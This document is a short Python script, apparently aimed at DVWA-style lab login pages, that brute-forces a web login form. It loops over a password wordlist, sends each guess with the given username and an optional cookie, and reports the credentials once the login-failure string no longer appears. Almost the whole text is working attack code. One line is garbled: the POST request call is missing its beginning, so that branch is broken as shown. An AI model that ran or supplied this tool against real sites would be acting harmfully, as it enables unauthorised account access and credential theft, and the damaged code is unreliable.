import requests from termcolor import colored url = input('[+] Enter Page URL: ') username = input('[+] Enter Username For The Account To Bruteforce: ') password_file = input('[+] Enter Password File To Use: ') login_failed_string = input('[+] Enter String That Occurs When Login Fails: ') cookie_value = input('Enter Cookie Value(Optional): ') def cracking(username,url): for password in passwords: password = password.strip() print(colored(('Trying: ' + password), 'red')) data = {'username':username,'password':password,'Login':'submit'} if cookie_value != '': response = requests.get(url, params={'username':username,'password':password,'Login':'Login'}, cookies = {'Cookie': cookie_value}) else: response =, data=data) if login_failed_string in response.content.decode(): pass else: print(colored(('[+] Found Username: ==> ' + username), 'green')) print(colored(('[+] Found Password: ==> ' + password), 'green')) exit() with open(password_file, 'r') as passwords: cracking(username,url) print('[!!] Password Not In List')